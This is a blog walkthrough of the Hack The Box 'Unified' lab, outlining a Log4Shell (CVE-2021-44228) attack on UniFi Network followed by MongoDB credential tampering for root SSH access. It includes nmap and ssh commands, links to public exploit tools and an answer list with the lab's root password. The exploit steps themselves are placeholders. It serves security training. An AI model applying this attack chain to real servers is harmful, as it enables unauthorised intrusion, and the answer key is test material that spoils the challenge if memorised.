Top 5 This Week

Related Posts

HTB – Hack The Box – Tier 2 – Challenge 4 – Unified

Getting your Trinity Audio player ready...

Advanced Penetration Testing: Solving HTB Tier 2 – Challenge 4 ‘Unified’

Welcome to our advanced tutorial in the “HTB – Hack the Box Series” on solving Tier 2 – Challenge 4, ‘Unified’. This guide is part of our ongoing series, aiming to equip you with the skills for sophisticated penetration testing. Explore more challenges at: HTB – Hack the Box Series.

System Preparation: Ensuring Kali Linux is Up-to-Date

Start by updating Kali Linux, ensuring all tools are current for optimal performance:

$ sudo apt full-upgrade -y

Establishing a Secure Connection

Establish a VPN connection to maintain anonymity and secure access to the HTB network:

$ sudo openvpn Downloads/starting_point_UserName.ovpn

Detailed Reconnaissance

Engage in comprehensive reconnaissance using Nmap to identify open ports and running services on the target IP:

$ nmap -sC -sV -p- 10.129.67.151

Exploiting Identified Vulnerabilities

Identify and exploit vulnerabilities based on open ports and service information. Utilize CVE-2021-44228 for exploiting Unifi Network services:

$ [exploitation commands and procedures]

Database Manipulation and User Access

Exploit MongoDB to manipulate user credentials. Use techniques for database access and modification, ensuring comprehensive control over the system:

$ [database manipulation commands]

Securing Administrative Access

Gain root access through SSH using the credentials obtained, and retrieve both user and root flags as proof of successful exploitation:

$ ssh [email protected]

Questions:

  1. Which are the first four open ports? – 22,8080,6789,8443
  2. What is title of the software that is running running on port 8443? – Unifi Network
  3. What is the version of the software that is running? – 6.4.54
  4. What is the CVE for the identified vulnerability? – CVE-2021-44228
  5. What protocol does JNDI leverage in the injection? – ldap
  6. What tool do we use to intercept the traffic, indicating the attack was successful? – tcpdump
  7. What port do we need to inspect intercepted traffic for? – 389 (default ldap port)
  8. What port is the MongoDB service running on? – 27117
  9. What is the default database name for UniFi applications? – ace
  10. What is the function we use to enumerate users within the database in MongoDB? – db.admin.find()
  11. What is the function we use to update users within the database in MongoDB? – db.admin.update()
  12. What is the password for the root user? – NotACrackablePassword4U2022

Usefull Links:

  • https://unified.htb:8443/manage/account/login?redirect=%2Fmanage
  • https://www.sprocketsecurity.com/resources/another-log4j-on-the-fire-unifi
  • https://github.com/puzzlepeaches/Log4jUnifihttps://github.com/veracode-research/rogue-jndi
  • https://erikdekker.net/
  • https://gbe0.com/posts/networking/ubiquiti/ubiquiti-unifi-controller-mongodb-issues/
  • https://www.sprocketsecurity.com/resources/another-log4j-on-the-fire-unifi
  • https://www.hackthebox.com/achievement/machine/303878/441

Final Submission and Ethical Considerations

Upon successful completion, submit the flags as required by the HTB platform. Remember, this tutorial is for educational purposes, adhering to ethical hacking standards and legal boundaries.

Through this tutorial, you’ve not only solved the challenge but also honed your skills in advanced penetration testing. We encourage you to continue exploring the HTB platform, applying your knowledge responsibly and ethically.

Cogeanu Marius
Cogeanu Mariushttps://cogeanu.com
Marius Cogeanu is a distinguished IT consultant and cybersecurity virtuoso based in Prague, Czechia. With a rich 20-year journey in the IT realm, Marius has carved a niche in network security and technological solutions, adeptly harmonizing tech with business requirements. His experience spans from Kyndryl to IBM, and as a valued independent consultant, where he's renowned for his innovative approaches in enhancing business operations with cutting-edge tech.Marius's forte lies in demystifying complex IT concepts, ensuring clarity and alignment for stakeholders at all levels. His commitment to staying at the forefront of industry trends and seeking innovative solutions cements his status as a go-to expert in cybersecurity. Driven by a fervent passion for technology and its potential to revolutionize businesses, Marius thrives on tackling challenging ventures, applying his prowess in network design, IT service management, and strategic planning.Currently, Marius is focused on leading-edge IT project management, infrastructure design, and fortifying cybersecurity, guiding clients through the intricate digital landscape with unmatched expertise and insight.Discover more on https://cogeanu.com

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Popular Articles